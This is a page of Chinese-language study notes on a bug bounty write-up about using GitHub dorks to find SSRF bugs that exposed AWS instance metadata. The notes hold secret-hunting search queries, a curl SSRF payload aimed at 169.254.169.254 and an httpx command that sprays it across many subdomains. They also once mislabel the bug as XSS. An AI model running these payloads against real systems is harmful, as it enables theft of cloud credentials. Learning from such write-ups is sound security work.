2022-04-06：Santosh Kumar Sha How Github recon help me to find NINE FULL SSRF Vulnerability with AWS metadata access

Santosh Kumar Sha (@killmongar1996) Jun 6, 2021

https://notifybugme.medium.com/how-github-recon-help-me-to-find-nine-full-ssrf-vulnerability-with-aws-metadata-access-531d931413a5

這篇不長，稍微看了一下，應該蠻適合我、初學者，多了解怎麼用工具做 recon
這篇專門拿 Github 來 recon

TOOLS used for the exploitation

Subfinder (https://github.com/projectdiscovery/subfinder)
httpx (https://github.com/projectdiscovery/httpx)
gau(Corben) — https://github.com/lc/gau
waybackurls(tomnomnom) — https://github.com/tomnomnom/waybackurls

假設目標是 example.com，那範圍內的目標就是 *.example.com

作者這樣去找出 subdomain (各工具 pipeline 多少可以避免 miss sub-domain)

gau -subs example.com | unfurl domains >> vul1.txt
waybackurls example.com | unfurl domains >> vul2.txt
subfinder -d example.com -silent >> vul3.txt

(不是非常懂為什麼要串 unfurl)

最後整合

cat vul1.txt vul2.txt vul3.txt | sort -u >> unique_sub.txt

Github recon

Github 太多資料了，作者覺得「組織/公司的員工」才是最有機會、有洩漏的地方，所以針對這邊下手

這樣搜尋 github

"testdev.example.com" user:<username> <keytosearch>
"corps.example.com" user:<username> <keytosearch>
"test.example.com" user:<username> <keytosearch>

也這樣試過

"testdev.admin.example.com" user:<username> auth_token
"testdev.admin.example.com" user:<username> apikey
"testdev.admin.example.com" user:<username> secret

不過上面的都沒查到東西，接著作者決定查察 path, endpoints, 像這樣

"corps.example.com" org:<name of organization> "/admin/dashboard"
"testdev.example.com" org:<name of organization> "/users/dashboard"
"example.com" org:<name of organization> "/admin/setup"

還是沒東西，接著換

"example.com" org:<name of organization> "next_url"
"example.com" org:<name of organization> "img_url"

Still no success But when i use these parameter "image"

"example.com" org:<name of organization> "image"

有找到一個有著這樣的 url

/fetch/info?inquiry=&image_Host=https://example.com/user/

這就讓作者有興趣，來玩看看這 XSS 了，他用了類似

curl -sk "https://example.com/fetch/info?inquiry=&image_Host=http://169.254.169.254/"

成功下載了 AWS 一些 internal metadata

這個讓他有啟發再多試試

因為前面已經先把所有 subdomain 搜集好了，所以他隨手這樣嘗試

cat unique_sub.txt | sort -u | httpx -silent -path "/fetch/info?inquiry=&image_Host=http://169.254.169.254/" -status-code -content-length

最後在同 path、不同的 sub-domain 底下，總共找到 8 個 ssfr

others

另外這裡有 repo 有列出可能能 github dorks for recon

https://github.com/TheBinitGhimire/GitHub-Recon

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

2022-04-06：Santosh Kumar Sha How Github recon help me to find NINE FULL SSRF Vulnerability with AWS metadata access.md

2022-04-06：Santosh Kumar Sha How Github recon help me to find NINE FULL SSRF Vulnerability with AWS metadata access.md

2022-04-06：Santosh Kumar Sha How Github recon help me to find NINE FULL SSRF Vulnerability with AWS metadata access

Santosh Kumar Sha (@killmongar1996) Jun 6, 2021

https://notifybugme.medium.com/how-github-recon-help-me-to-find-nine-full-ssrf-vulnerability-with-aws-metadata-access-531d931413a5

TOOLS used for the exploitation

Github recon

others

Files

2022-04-06：Santosh Kumar Sha How Github recon help me to find NINE FULL SSRF Vulnerability with AWS metadata access.md

Latest commit

History

2022-04-06：Santosh Kumar Sha How Github recon help me to find NINE FULL SSRF Vulnerability with AWS metadata access.md

File metadata and controls

2022-04-06：Santosh Kumar Sha How Github recon help me to find NINE FULL SSRF Vulnerability with AWS metadata access

Santosh Kumar Sha (@killmongar1996) Jun 6, 2021

https://notifybugme.medium.com/how-github-recon-help-me-to-find-nine-full-ssrf-vulnerability-with-aws-metadata-access-531d931413a5

TOOLS used for the exploitation

Github recon

others